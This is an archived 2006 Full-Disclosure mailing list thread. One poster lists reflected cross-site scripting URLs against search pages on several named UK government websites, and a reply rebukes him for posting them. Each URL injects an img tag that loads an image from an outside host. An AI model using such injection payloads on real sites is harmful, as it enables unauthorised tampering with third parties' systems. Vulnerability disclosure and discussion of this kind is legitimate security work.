[Full-disclosure] XSS funtime
Edward Pearson
Ed at unityitservices.co.uk
Fri Aug 4 09:37:58 BST 2006
No dude, XSS random sites is just lame. There is no competition, this
kinda shit belongs on http://www.elitehackers.info. Not a SecList.
Especially http://disabilitydatabase.mla.gov.uk
<http://disabilitydatabase.mla.gov.uk/index.asp?startrow=1&action=search
&Keywords=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E> ,
have you no shame?
Ed
________________________________
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of codeslag
Sent: 03 August 2006 23:09
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] XSS funtime
http://disabilitydatabase.mla.gov.uk/index.asp?startrow=1&action=search&
Keywords=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E
http://www.audit-commission.gov.uk/search/search_result.asp?txtSearchKey
words=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E
http://www.salford.gov.uk/search.htm?col=justhtml&qt=%3Cimg%20src=%22htt
p://0xdeadface.co.uk/richard.jpg%22/%3E3E
http://www.ealing.gov.uk/search.jsp?query=%3Cimg+src%3D%22http%3A%2F%2F0
xdeadface.co.uk%2Frichard.jpg%22%2F%3E&goButton=Search&index=all
http://www.successforall.gov.uk/index.cfm?pg=61&q=%3Cimg%20src=%22http:/
/0xdeadface.co.uk/richard.jpg%22/%3E
Does this mean I win the XSS contest? After all i have h4><0r3d t3h
g1bs0n!!111111
hugs & kisses dyn0/codeslag
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060804/e151eb41/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.